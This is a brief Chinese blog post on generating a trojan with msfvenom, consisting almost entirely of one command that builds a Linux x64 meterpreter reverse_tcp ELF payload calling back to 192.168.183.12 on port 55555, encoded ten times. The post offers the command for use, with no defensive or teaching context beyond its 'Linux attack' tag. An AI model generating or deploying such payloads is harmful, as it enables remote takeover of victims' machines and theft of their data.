0
点赞
收藏
分享

微信扫一扫

msfvenom生成木马-Linux Wondows

dsysama 2022-02-12 阅读 93

Linux攻击

生成木马文件

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 -b '\x00' -i 10 -f elf -o yu_demo_two
举报

相关推荐

0 条评论